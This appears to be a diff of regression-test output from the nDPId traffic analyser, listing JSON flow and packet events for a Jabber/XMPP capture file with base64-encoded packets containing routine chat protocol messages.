-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1504181789350,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789350,"pkt":"AAwpvhIxAFBWwAAICABFAAA0dxlAAIAGjb\/AqDoBwKg6mdDUFGaBHPlXAAAAAIACIAD5dQAAAgQFtAEDAwgBAQQC"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1504181789365,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789365,"pkt":"AFBWwAAIAAwpvhIxCABFAAA0AABAAEAGRNnAqDqZwKg6ARRm0NRyyKsUgRz5WIASchCJeAAAAgQFtAEBBAIBAwMH"} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1504181789366,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1504181789366,"pkt":"AAwpvhIxAFBWwAAICABFAAAodxpAAIAGjcrAqDoBwKg6mdDUFGaBHPlYcsirFVAQAQA7WwAAAAAAAAAA"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1504181789350,"flow_last_seen":1504181789367,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1504181789367,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":13,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1504181789350,"flow_last_seen":1504181789418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1504181789418,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} -00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":13,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":13,"packets-processed":13,"total-skipped-flows":0,"total-l4-payload-len":157,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1504181789418} +00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1502379693992} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502379723841,"flow_last_seen":1502379723841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1502379723841,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57094,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1502379723841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1502379723841,"pkt":"Tl6SKSKGaFs1pN2oCABFAABAZ6hAAEAGAACsEAA+rBABit8GFGbDqJX1AAAAALAC\/\/9aGwAAAgQFtAEDAwQBAQgKTgMEJwAAAAAEAgAA"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1502379723842,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1502379723842,"pkt":"aFs1pN2oTl6SKSKGCABFAAA8AABAAEAG4NOsEAGKrBAAPhRm3wagxQKCw6iV9qASOJCmRgAAAgQFtAQCCAoAGMyaTgMEJwEDAwc="} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1502379723842,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1502379723842,"pkt":"Tl6SKSKGaFs1pN2oCABFAAA0qcBAAEAGAACsEAA+rBABit8GFGbDqJX2oMUCg4AQICtaDwAAAQEICk4DBCcAGMya"} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1502379723841,"flow_last_seen":1502379723843,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1502379723843,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57094,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"jabber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502380175298,"flow_last_seen":1502380175298,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1502380175298,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57122,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"jabber.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1502380175298,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1502380175298,"pkt":"Tl6SKSKGaFs1pN2oCABFAABAIwFAAEAGAACsEAA+rBABit8iFGaEgGHPAAAAALAC\/\/9aGwAAAgQFtAEDAwQBAQgKTgnffgAAAAAEAgAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"jabber.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1502380175299,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1502380175299,"pkt":"aFs1pN2oTl6SKSKGCABFAAA8AABAAEAG4NOsEAGKrBAAPhRm3yLL7qcahIBh0KASOJCKxQAAAgQFtAQCCAoAH7AnTgnffgEDAwc="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"jabber.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1502380175299,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1502380175299,"pkt":"Tl6SKSKGaFs1pN2oCABFAAA0ciBAAEAGAACsEAA+rBABit8iFGaEgGHQy+6nG4AQICtaDwAAAQEICk4J334AH7An"} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"jabber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1502380175298,"flow_last_seen":1502380175300,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1502380175300,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57122,"dst_port":5222,"l4_proto":"tcp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"jabber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502380213387,"flow_last_seen":1502380213387,"flow_idle_time":7580000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1502380213387,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57126,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"jabber.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1502380213387,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1502380213387,"pkt":"Tl6SKSKGaFs1pN2oCABFAABEEUNAAEAGAACsEAA+rBABit8mFGZE6SgmjZ+UW4AYIABaHwAAAQEICk4Kc24AIDNjPC9zdHJlYW06c3RyZWFtPg=="} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"jabber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502380213387,"flow_last_seen":1502380213387,"flow_idle_time":7580000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1502380213387,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57126,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"jabber.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1502380213387,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1502380213387,"pkt":"Tl6SKSKGaFs1pN2oCABFAAA0xQRAAEAGAACsEAA+rBABit8mFGZE6Sg2jZ+UW4ARIABaDwAAAQEICk4Kc24AIDNj"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"jabber.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1502380213387,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1502380213387,"pkt":"aFs1pN2oTl6SKSKGCABFAAA0Q+dAAEAGnPSsEAGKrBAAPhRm3yaNn5RbROkoNoAQAKyS+AAAAQEICgAgRPBOCnNu"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"jabber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502380249631,"flow_last_seen":1502380249631,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1502380249631,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57129,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"jabber.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1502380249631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1502380249631,"pkt":"Tl6SKSKGaFs1pN2oCABFAADAznVAAEAGAACsEAA+rBABit8pFGbSamxaY9XMjIAYIABamwAAAQEICk4LAEwAIKhkPGlxIHR5cGU9J3NldCcgaWQ9J3B1cnBsZWRkZTgwZmRhJyB0bz0nY3MteG1wcC5sYW4nPjxjb21tYW5kIHhtbG5zPSdodHRwOi8vamFiYmVyLm9yZy9wcm90b2NvbC9jb21tYW5kcycgbm9kZT0ncGluZycgYWN0aW9uPSdleGVjdXRlJy8+PC9pcT4="} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"jabber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502380249631,"flow_last_seen":1502380249631,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1502380249631,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57129,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"jabber.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1502380249632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1502380249632,"pkt":"aFs1pN2oTl6SKSKGCABFAAA0PqxAAEAGoi+sEAGKrBAAPhRm3ylj1cyM0mps5oAQALWX3gAAAQEICgAg0oZOCwBM"} 
+00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"jabber.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1502380249634,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"thread_ts_msec":1502380249634,"pkt":"aFs1pN2oTl6SKSKGCABFAAE1Pq1AAEAGoS2sEAGKrBAAPhRm3ylj1cyM0mps5oAYALXYFQAAAQEICgAg0ohOCwBMPGlxIHhtbDpsYW5nPSdlbicgdG89J3RvbUBjcy14bXBwLmxhbi9kYXJrc3RhcicgZnJvbT0nY3MteG1wcC5sYW4nIHR5cGU9J3Jlc3VsdCcgaWQ9J3B1cnBsZWRkZTgwZmRhJz48Y29tbWFuZCBzdGF0dXM9J2NvbXBsZXRlZCcgc2Vzc2lvbmlkPScyMDE3LTA4LTEwVDE1OjUxOjAxLjI1MjkxMlonIG5vZGU9J3BpbmcnIHhtbG5zPSdodHRwOi8vamFiYmVyLm9yZy9wcm90b2NvbC9jb21tYW5kcyc+PG5vdGU+UG9uZzwvbm90ZT48L2NvbW1hbmQ+PC9pcT4="} +00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":192,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":192,"packets-processed":189,"total-skipped-flows":0,"total-l4-payload-len":28826,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":4,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1502380393542} +00672{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":200,"source":"jabber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1502380213387,"flow_last_seen":1502380213388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1502380400412,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57126,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"jabber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502380724652,"flow_last_seen":1502380724652,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1502380724652,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57147,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"jabber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1502380724652,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1502380724652,"pkt":"Tl6SKSKGaFs1pN2oCABFAABA60NAAEAGAACsEAA+rBABit87FGY\/5vETAAAAALAC\/\/9aGwAAAgQFtAEDAwQBAQgKThI3ywAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"jabber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1502380724653,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1502380724653,"pkt":"aFs1pN2oTl6SKSKGCABFAAA8AABAAEAG4NOsEAGKrBAAPhRm3zt3JmV0P+bxFKASOJAcGgAAAgQFtAQCCAoAKBIgThI3ywEDAwc="} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"jabber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1502380724653,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1502380724653,"pkt":"Tl6SKSKGaFs1pN2oCABFAAA0qlxAAEAGAACsEAA+rBABit87FGY\/5vEUdyZldYAQICtaDwAAAQEICk4SN8sAKBIg"} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"jabber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1502380724652,"flow_last_seen":1502380724653,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1502380724653,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57147,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"jabber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502380915481,"flow_last_seen":1502380915481,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1502380915481,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57149,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00789{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"jabber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1502380915481,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":305,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":305,"pkt_l4_len":271,"thread_ts_msec":1502380915481,"pkt":"Tl6SKSKGaFs1pN2oCABFAAEj8WlAAEAGAACsEAA+rBABit89FGZwJ5QInxoVWIAYIABa\/gAAAQEICk4VHZgAKjJ5PHByZXNlbmNlIHRvPSdjaGF0LXdpdGgtdG9tQGNvbmZlcmVuY2UuY3MteG1wcC5sYW4vdG9tQGNzLXhtcHAubGFuJz48YyB4bWxucz0naHR0cDovL2phYmJlci5vcmcvcHJvdG9jb2wvY2Fwcycgbm9kZT0naHR0cDovL3BpZGdpbi5pbS8nIGhhc2g9J3NoYS0xJyB2ZXI9J0RkbnlkUUc3UkdoUDlFM2s5U2YrYitiRjB6bz0nLz48eCB4bWxucz0naHR0cDovL2phYmJlci5vcmcvcHJvdG9jb2wvbXVjJy8+PC9wcmVzZW5jZT4="} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"jabber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502380915481,"flow_last_seen":1502380915481,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1502380915481,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57149,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +01012{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"jabber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1502380915486,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":474,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":474,"pkt_l4_len":440,"thread_ts_msec":1502380915486,"pkt":"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"} 
+00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"jabber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1502380915486,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1502380915486,"pkt":"aFs1pN2oTl6SKSKGCABFAACsmGdAAEAGR\/ysEAGKrBAAPhRm3z2fGhbwcCeU94AYAP6TqgAAAQEICgAq+5ZOFR2YPG1lc3NhZ2UgdG89J3RvbUBjcy14bXBwLmxhbi9kYXJrc3RhcicgZnJvbT0nY2hhdC13aXRoLXRvbUBjb25mZXJlbmNlLmNzLXhtcHAubGFuJyB0eXBlPSdncm91cGNoYXQnPjxzdWJqZWN0Lz48L21lc3NhZ2U+"} +00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":260,"source":"jabber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1502380724652,"flow_last_seen":1502380725074,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":338,"flow_tot_l4_payload_len":1426,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1502380919392,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57147,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":260,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":260,"packets-processed":243,"total-skipped-flows":0,"total-l4-payload-len":34275,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":6,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":36,"global_ts_msec":1502381519875} 
+00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":289,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":289,"packets-processed":270,"total-skipped-flows":0,"total-l4-payload-len":36212,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":6,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":37,"global_ts_msec":1504181789350} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"jabber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1504181789350,"flow_last_seen":1504181789350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1504181789350,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"jabber.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1504181789350,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789350,"pkt":"AAwpvhIxAFBWwAAICABFAAA0dxlAAIAGjb\/AqDoBwKg6mdDUFGaBHPlXAAAAAIACIAD5dQAAAgQFtAEDAwgBAQQC"} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"jabber.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1504181789365,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789365,"pkt":"AFBWwAAIAAwpvhIxCABFAAA0AABAAEAGRNnAqDqZwKg6ARRm0NRyyKsUgRz5WIASchCJeAAAAgQFtAEBBAIBAwMH"} 